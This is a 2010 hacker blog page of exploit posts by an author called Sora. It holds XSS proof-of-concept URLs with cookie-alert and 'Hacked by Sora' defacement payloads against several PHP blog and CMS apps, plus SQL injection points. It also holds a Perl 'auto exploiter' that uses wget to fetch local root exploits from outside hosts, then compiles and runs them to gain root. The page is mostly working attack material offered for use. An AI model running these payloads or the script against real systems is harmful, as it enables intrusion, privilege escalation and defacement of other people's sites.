Simple PHP Blog Cross Site Scripting Exploit

Posted in Exploits on January 12, 2010 by Sora

# Exploit Title: Simple PHP Blog Cross Site Scripting Exploit
# Date: January 12th, 2010
# Author: Sora
# Software Link: http://www.sourceforge.net/projects/sphpblog/files/SimplePHPBlog%20%28Beta%29/0.5.1/sphpblog_0511.zip/download
# Version: v5.11
# Tested on: Windows Vista

————————————
> Simple PHP Blog Cross Site Scripting Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Simple PHP Blog suffers from a remote cross site scripting exploit in the parameter ‘q’ of search.php.

# Proof of Concept: http://127.0.0.1/blog/search.php?q=”><H2>Hacked by Sora</H2><script>alert(document.cookie)</script>

Calendar Express 2 Cross Site Scripting Exploit

Posted in Exploits on January 12, 2010 by Sora

# Exploit Title: Calendar Express 2 Cross Site Scripting Exploit
# Date: January 11th, 2010
# Author: Sora
# Version: 2.0
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Calendar Express 2 XSS Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/

# Vulnerability Description:
Calendar Express 2 suffers a remote cross site scripting exploit in search.php with the parameter “allwords”
due to unsanitized inputs.

# Proof of Concept:
http://server/iwcalendar/search.php?allwords=”><script>alert(document.cookie)</script><H2>Hacked by Sora</h2>&oneword=&cid=3&catid=3

[ Greetz: ]

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 (Origin) # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

Be sure to visit cyber-sec.org and greyhathackers.wordpress.com!

[ ------------------ EOF ------------------ ]

[cyber-sec.org auto exploiter]

Posted in Tools on January 10, 2010 by Sora
#!/usr/bin/perl -w

################################################################################################################
#              ___.                                                                                            #
#  ____ ___.__.\_ |__   ___________            ______ ____   ____                                              #
#_/ ___<   |  | | __ \_/ __ \_  __ \  ______  /  ___// __ \_/ ___\ [-- created by Sora --]                     #
#\  \___\___  | | \_\ \  ___/|  | \/ /_____/  \___ \\  ___/\  \___ [-- https://greyhathackers.wordpress.com/ --]#
# \___  > ____| |___  /\___  >__|            /____  >\___  >\___  >[-- http://www.cyber-sec.org/ --]           #
#     \/\/          \/     \/    auto exploit execute\/     \/     \/                                          #
################################################################################################################

print "[ cyber-sec.org auto exploit execution created by Sora ]\n";
print "[ http://www.greyhathackers.wordpress.com/\n";
print "[ http://www.cyber-sec.org/ ]\n";

print "---------------------\n";
print " Menu:\n";
print " 1. h00lyshit.c\n";
print " 2. ImpelDown.c\n";
print " 3. Custom exploit\n";
print "---------------------\n";
$exploit = <STDIN>;
if ($exploit==1){&shit}
if ($exploit==2){&impel}
if ($exploit==3){&custom}

sub shit
{
print "[+] downloading h00lyshit.c...\n";
system ("cd /tmp/;mkdir exploits;chmod 777 exploits;cd exploits;wget www.xfocus.com/tools/200607/h00lyshit.c;chmod 777 h00lyshit.c;gcc h00lyshit.c -o h00lyshit;dd if=/dev/urandom of=largefile count=2M");
print "[+] executing h00lyshit...\n";
system ("./h00lyshit largefile");
print "[+] executed h00lyshit\n";
}

sub impel
{
print "[+] downloading ImpelDown.c...\n";
system ("cd /tmp/;mkdir exploits;chmod 777 exploits;cd exploits;wget www.packetstormsecurity.org/0911-exploits/ImpelDown.c;chmod 777 ImpelDown.c;gcc ImpelDown.c -o impeldown");
print "[+] executing ImpelDown...\n";
system ("./impeldown");
print "[+] executed ImpelDown\n";
}

sub custom
{
print "[+] site directory:\n";
$userdir = <STDIN>;
print "[+] localroot name:\n";
$localrootname = <STDIN>;
if (-x "/usr/bin/wget"){
system ("cd /tmp/;mkdir s0ra;chmod 777 s0ra;cd s0ra;wget $userinfo;chmod 777 $localrootname;./$localrootname");
print "[+] successfully executed custom exploit!\n";
system ("whoami");
}

}

[cyber-sec.org] file info grabber

Posted in Tools on January 9, 2010 by Sora

File Info Grabber [cyber-sec.org]
Author: Sora
Contact: vhr95zw [at] hotmail [dot] com
Website: https://greyhathackers.wordpress.com/


s0ra@sora-desktop:$ cat about.txt
[ > File Info Grabber - created for cyber-sec.org! < ]

[--------------------- EOF ---------------------]

Download link: http://rapidshare.com/files/332431533/_cyber-sec.org__File_info_grabber_-_Sora.rar

Sniggabo CMS v2.21 XSS Vulnerability

Posted in Exploits on January 7, 2010 by Sora

# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: v2.21
# Tested on: Windows Vista Home Premium and Linux 2.6.32

—————————————-
> Sniggabo CMS v2.21 Cross Site Scripting Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# Description:
Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter
‘q’ of search.php.

# PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20%5Bat%5D%20hotmail%20%5Bdot%5D%20com%3C/h1%3E%3Chr%3Eh4x3d%20-%20https://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca

# Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # 原点 # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability

Posted in Exploits on January 7, 2010 by Sora

# Exploit Title: Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability
# Date: January 6th, 2010
# Author: Sora
# Version: 2.6.1
# Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3)
——————————
> Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”

# VULNERABILITY DESCRIPTION:
Type: SQL Injection
Level: 4/5 (CRITICAL)

Sora has advised that Ulisse’s ladder.php file from Ulisse’s Scripts 2.6.1
suffers a remote SQL injection vulnerability in the parameter ‘gid’. The database inputs
are not properly sanitized.

# VULNERABILITY SOLUTION:
Sanitize the unsanitized database inputs in the file ladder.php.

# Proof of Concept: http://www.site.com/ulisse/ladder.php?gid=1&#8242;

My Gaming Ladder v1.0 SQL Injection Vulnerability

Posted in Exploits on January 5, 2010 by Sora

# Exploit Title: My Gaming Ladder SQL Injection Vulnerability
# Date: January 4th, 2009
# Author: Sora
# Software Link: http://www.mygamingladder.com/
# Version: 1.0
# Tested on: Windows and Linux
———————————–
> MyGamingLadder SQL Injection Vulnerability
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: https://greyhathackers.wordpress.com/
> Google Dork: “In your dreams, script kiddies.”
> Cost of the program: $190.00 (wow!)

# Vulnerability Description:
My Gaming Ladder v1.0 suffers a remote SQL injection vulnerability in
the parameter “ladderid=” of ladder.php. The attacker can gain user cresedentials and deface
the vulnerable website. They will either infect the website, or they will deface it.

# Proof of Concept:

http://www.test.info/mgl/ladder.php?ladderid=3&#8242;

Follow

Get every new post delivered to your Inbox.